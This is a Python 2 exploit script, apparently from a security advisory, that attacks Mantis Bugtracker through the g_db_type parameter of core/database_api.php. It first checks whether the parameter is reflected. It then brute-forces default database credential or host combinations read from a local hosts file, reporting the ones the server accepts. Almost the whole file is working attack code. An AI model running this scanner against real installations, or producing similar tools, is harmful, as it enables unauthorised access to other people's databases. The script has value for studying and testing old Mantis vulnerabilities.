#!/usr/bin/env python

"""
Mantis Bugtracker Remote Database Scanner Exploit v 1.0

Author: Jose Antonio Coret (Joxean Koret)
E-mail: joxeankoret<<<<<<<<<<<<<<<<at>>>>>>>>>>>>>>>>>>yah00<<<<DOT>>>>es

This exploit is under the GPL License, version 2.

This demonstration is provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

"""

import sys
import urllib

def check_vulnerable(mantis_site):
	"""Report whether the Mantis install reflects the g_db_type query value.

	Fetches <mantis_site>/core/database_api.php with a marker string in the
	g_db_type parameter and returns True when that marker shows up anywhere
	in the response body, False otherwise.  Any failure while fetching the
	page is printed on stdout and ends the program with exit status 0.

	mantis_site -- base URL of the installation, used verbatim (no scheme or
	path validation is done here; it comes from the interactive prompt).
	"""
	marker = "trying_it"
	url = mantis_site + '/core/database_api.php?g_db_type=' + marker
	try:
		body = urllib.urlopen(url).read()
	except:
		# Catch-all, like the rest of the tool: every fetch error (and a
		# Ctrl-C during the request) is reported and the program exits 0.
		print ""
		print "Error getting document: " + str(sys.exc_info()[1])
		sys.exit(0)
	# Plain substring test; same result as the original rfind() > -1.
	return marker in body
		
def try_login_step(mantis_site, host):
	"""Send one candidate value as g_db_type and report whether it was accepted.

	host is appended to the query string exactly as given (callers pass
	lines read from the hosts.<db_type> file).  An empty response body is
	the only success signal, so any reply with no body at all -- whatever
	the reason -- is reported as True.  Every other body is a failure: the
	text of a PHP "<b>Warning</b>:" message is printed when it can be
	extracted, otherwise the complete server response is echoed to the
	terminal verbatim.  Fetch errors are printed and end the program with
	exit status 0.
	"""
	url = mantis_site + '/core/database_api.php?g_db_type=' + host
	try:
		body = urllib.urlopen(url).read()
		if body == "":
			return True
		try:
			warning = body.split('<b>Warning</b>:')[1].split(' in <b>')[0].strip(' ')
			print " [-] ERROR: " + warning
		except:
			# No parsable PHP warning: dump the raw response instead.
			rule = "-----------------------------------------------------------------------------"
			print ""
			print "RESPONSE FROM SERVER: "
			print rule
			print body
			print rule
		return False
	except:
		print ""
		print "Error getting document: " + str(sys.exc_info()[1])
		sys.exit(0)

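def try_login(mantis_site, db_type):
	"""Feed every line of hosts.<db_type> to try_login_step() and report hits.

	db_type is used verbatim to build the file name (so the "all" choice
	offered by the prompt simply opens a file called hosts.all); the file
	is looked up relative to the current working directory.  Each line,
	with trailing whitespace removed, is passed on unchanged, and a
	" [!] ... apparently works!" line is printed for every candidate the
	server accepted.  An unreadable file is reported and ends the program
	with exit status 0.
	"""
	try:
		hosts = open("hosts." + db_type, "r")
	except:
		print "Error opening username/password combinations file for database type " + db_type + " (hosts." + db_type + ")"
		print sys.exc_info()[1]
		sys.exit(0)

	# try/finally (rather than `with`) keeps this valid on old Python 2
	# releases; it closes the handle even when try_login_step() ends the
	# program via sys.exit(), which the original never did.
	try:
		for line in hosts:
			candidate = line.rstrip()
			print "Trying " + candidate + " ... "
			if try_login_step(mantis_site, candidate):
				print " [!] " + candidate + " apparently works!"
	finally:
		hosts.close()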
	

# Interactive entry point.  This runs at import time too: the script has no
# main() guard, matching the original layout.
print "Mantis Bugtracker Database Scanner Exploit"
print ""
print "Author: Jose Antonio Coret"
print ""


try:
	mantis_site = raw_input("Mantis Bug Tracker server site [http://localhost/mantis]: ")
except:
	# EOF or Ctrl-C at the prompt.
	print "Aborted"
	sys.exit(0)

# The URL is taken as typed; an empty answer selects the default.
if not mantis_site:
	mantis_site = "http://localhost/mantis"


print " [+] Checking if it is vulnerable ... "
if not check_vulnerable(mantis_site):
	print " [-] No, it is not vulnerable"
	print " [+] Exiting"
	sys.exit(0)
print " [!] Yes, it is vulnerable"

print ""
try:
	res = raw_input("Try default username and password combinatios for the local database (yes, do it/n)? [n] ")
except:
	print "Aborted"
	sys.exit(0)

if res != "yes, do it":
	# Only the exact confirmation phrase continues.  "" and "n" cancel
	# silently; any other answer is explained before exiting.
	if res not in ("", "n"):
		print ""
		print "ERROR: You need to write 'yes, do it'. Cancelled."
	sys.exit(0)

try:
	res = raw_input("Default database to check (mysql, informix, oracle, firebird, pgsql, all)? [mysql] ")
	if not res:
		res = "mysql"
	print ""
	# NOTE: the bare except below also catches the SystemExit that
	# try_login() raises on its own failures, so those end with "Aborted".
	try_login(mantis_site, res)
except:
	print "Aborted"
	sys.exit(0)

print ""
print "Test finished"

